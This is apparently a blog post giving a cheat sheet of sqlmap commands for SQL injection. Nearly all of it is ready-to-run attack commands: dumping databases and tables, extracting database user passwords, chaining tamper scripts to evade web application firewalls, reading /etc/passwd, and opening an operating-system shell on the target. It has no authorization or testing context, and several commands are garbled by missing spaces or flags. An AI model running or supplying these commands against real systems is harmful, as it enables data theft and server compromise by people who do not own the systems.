SQLMap tool cheatshee commands



1⃣ Enumerate A Database With Vuln URL
$ ./sqlmap.py -u "example.com" --dbs

2⃣ Current Database
./sqlmap.py -u "example.com" --current-db

3⃣ Column Database User
$ ./sqlmap.py -u "example.com" --users

4⃣ Current User
$ ./sqlmap.py -u "example.com" --current-user

5⃣ Enumerate The Table Name Of The Database
$ ./sqlmap.py -u "example.com" --tables -D "database"

6⃣ Get The Column Of The Table
$ ./sqlmap.py -u "example.com" --columns -T "table name" -D "database"

7⃣ Get The Data In The Table Including The Column
$ ./sqlmap.py -u "example.com" --dump -C "field, field" -T "table name" -D "database"

8⃣ Bypass WAF
$ ./sqlmap.py -u "example.com" --dbs --tamper= apostrophemask,apostrophenullencode,chardoubleencode,escapequotes,overlongutf8,space2plus,symboliclogical,base64encode,unionalltounion,xforwardedfor,multiplespaces (accept with Y)

9⃣ Cookie Injection
$ ./sqlmap.py -u "example.com" --cookie "parameter" --tables --level 2

1⃣0⃣ POST Login Box Injection
$ ./sqlmap.py -r FILE.TXT -p username --tables --forms -v 3 --dbs --batch --os "Windows" --tamper=space2morehash.py,space2hash.py,base64encode.py,charencode.py

1⃣1⃣ Bypass WAF Automatically
$ ./sqlmap.py -u "example.com" -v 3 --dbs --batch --tamper=space2morehash.py,space2hash.py,base64encode.py,charencode.py

1⃣2⃣ Read The Database Version, Current User, Current Database
$ ./sqlmap.py -u "example.com" -f -b --current-user --current-db -v 1

1⃣3⃣ Determine The Current Database User Permissions
$ ./sqlmap.py -u "rebl0x3r.com" --privileges -U username-v 1

$ ./sqlmap.py -u "themaster.com" --is-dba -U username-v 1

1⃣4⃣ Read The Passwords Of All Database Users Or Specified Database Users
$ ./sqlmap.py -u "rebl0x3r.com" --users --passwords -v 2
$ ./sqlmap.py -u "rebl0x3r.com" --passwords -U root -v 2

1⃣5⃣ File-Read Read Web File
$ ./sqlmap.py -u "reblx.com" --file-read "/etc/passwd" -v 2

1⃣6⃣ Union Query Table Record
$ ./sqlmap.py "reblx3r.com" --union-cols

1⃣7⃣ Some Injections
Get the current user name
$ ./sqlmap.py -u "rebl0x3r.com" --current-user
Get the current database name
$ ./sqlmap.py -u "rebl0x3r.com" --current-db
Listname
$ ./sqlmap.py -u "rebl0x3r.com" --tables -D "db_name"
Column field
$ ./sqlmap.py -u "rebl0x3r.com" --columns -T "tablename" users-D "db_name" -v 0
Get the field contents
$ ./sqlmap.py -u "rebl0x3r.com" --dump -C "column_name" -T "table_name" -D "db_name" -v 0
Smart smart level Execution test level
$ ./sqlmap.py -u "rebl0x3r.com" --smart --level 3 --users
Dbms Specify database type
$ ./sqlmap.py -u "rebl0x3r.com" --dbms "Mysql" --users
Column database user
$ ./sqlmap.py -u "rebl0x3r.com" --users

1⃣8⃣ Execute The Shell Command
$ ./sqlmap.py -u "reblx34" --os-cmd="net user"
$ ./sqlmap.py -u "themasterx.eo" --os-shell

1⃣9⃣ Connect Directly To The Database
$ ./sqlmap.py -d "mysql://admin:admin@192.168.1.1:3306/testdb" --dbs

2⃣0⃣ Injection Level
$ ./sqlmap -u "URL" --level 3

2⃣1⃣ Use Sqlmap Plugin
$ ./sqlmap.py -u "URL" --tamper "space2morehash.py"




Enjoy! Follow us for more...

at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

How to connect to an FTP server from Linux?

To connect to an FTP server from a Linux system, you can use either a command-line FTP client or a graphical one. Here’s how to do it usin...